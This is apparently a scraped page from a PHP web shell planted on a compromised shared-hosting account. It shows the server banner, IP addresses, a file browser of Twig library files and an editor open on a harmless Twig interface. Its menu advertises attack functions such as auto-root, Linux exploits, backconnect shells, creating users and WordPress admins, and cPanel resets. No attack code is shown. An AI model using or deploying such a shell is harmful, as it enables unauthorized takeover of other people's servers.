Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
vendor /
twig /
twig /
lib /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
Cache
[ DIR ]
drwx---r-x
Error
[ DIR ]
drwx---r-x
Extension
[ DIR ]
drwx---r-x
Filter
[ DIR ]
drwx---r-x
Function
[ DIR ]
drwx---r-x
Loader
[ DIR ]
drwx---r-x
Node
[ DIR ]
drwx---r-x
NodeVisitor
[ DIR ]
drwx---r-x
Profiler
[ DIR ]
drwx---r-x
Sandbox
[ DIR ]
drwx---r-x
Test
[ DIR ]
drwx---r-x
TokenParser
[ DIR ]
drwx---r-x
Util
[ DIR ]
drwx---r-x
Autoloader.php
1.45
KB
-rw----r--
BaseNodeVisitor.php
192
B
-rw----r--
CacheInterface.php
164
B
-rw----r--
Compiler.php
128
B
-rw----r--
CompilerInterface.php
664
B
-rw----r--
ContainerRuntimeLoader.php
212
B
-rw----r--
Environment.php
140
B
-rw----r--
Error.php
128
B
-rw----r--
ExistsLoaderInterface.php
194
B
-rw----r--
ExpressionParser.php
160
B
-rw----r--
Extension.php
176
B
-rw----r--
ExtensionInterface.php
188
B
-rw----r--
FactoryRuntimeLoader.php
204
B
-rw----r--
FileExtensionEscapingStrategy....
212
B
-rw----r--
Filter.php
1.95
KB
-rw----r--
FilterCallableInterface.php
470
B
-rw----r--
FilterInterface.php
859
B
-rw----r--
Function.php
1.72
KB
-rw----r--
FunctionCallableInterface.php
476
B
-rw----r--
FunctionInterface.php
812
B
-rw----r--
Lexer.php
116
B
-rw----r--
LexerInterface.php
794
B
-rw----r--
LoaderInterface.php
170
B
-rw----r--
Markup.php
120
B
-rw----r--
Node.php
122
B
-rw----r--
NodeCaptureInterface.php
186
B
-rw----r--
NodeInterface.php
673
B
-rw----r--
NodeOutputInterface.php
182
B
-rw----r--
NodeTraverser.php
148
B
-rw----r--
NodeVisitorInterface.php
200
B
-rw----r--
Parser.php
120
B
-rw----r--
ParserInterface.php
709
B
-rw----r--
RuntimeLoaderInterface.php
212
B
-rw----r--
SimpleFilter.php
138
B
-rw----r--
SimpleFunction.php
146
B
-rw----r--
SimpleTest.php
130
B
-rw----r--
Source.php
120
B
-rw----r--
SourceContextLoaderInterface.p...
222
B
-rw----r--
Template.php
128
B
-rw----r--
TemplateInterface.php
1.2
KB
-rw----r--
TemplateWrapper.php
156
B
-rw----r--
Test.php
884
B
-rw----r--
TestCallableInterface.php
430
B
-rw----r--
TestInterface.php
504
B
-rw----r--
Token.php
116
B
-rw----r--
TokenParser.php
188
B
-rw----r--
TokenParserBroker.php
3.5
KB
-rw----r--
TokenParserBrokerInterface.php
1.2
KB
-rw----r--
TokenParserInterface.php
200
B
-rw----r--
TokenStream.php
140
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TokenParserBrokerInterface.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * (c) Arnaud Le Blanc * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ use Twig\TokenParser\TokenParserInterface; /** * Interface implemented by token parser brokers. * * Token parser brokers allows to implement custom logic in the process of resolving a token parser for a given tag name. * * @author Arnaud Le Blanc <arnaud.lb@gmail.com> * * @deprecated since 1.12 (to be removed in 2.0) */ interface Twig_TokenParserBrokerInterface { /** * Gets a TokenParser suitable for a tag. * * @param string $tag A tag name * * @return TokenParserInterface|null A Twig_TokenParserInterface or null if no suitable TokenParser was found */ public function getTokenParser($tag); /** * Calls Twig\TokenParser\TokenParserInterface::setParser on all parsers the implementation knows of. */ public function setParser(Twig_ParserInterface $parser); /** * Gets the Twig_ParserInterface. * * @return Twig_ParserInterface|null A Twig_ParserInterface instance or null */ public function getParser(); }
Close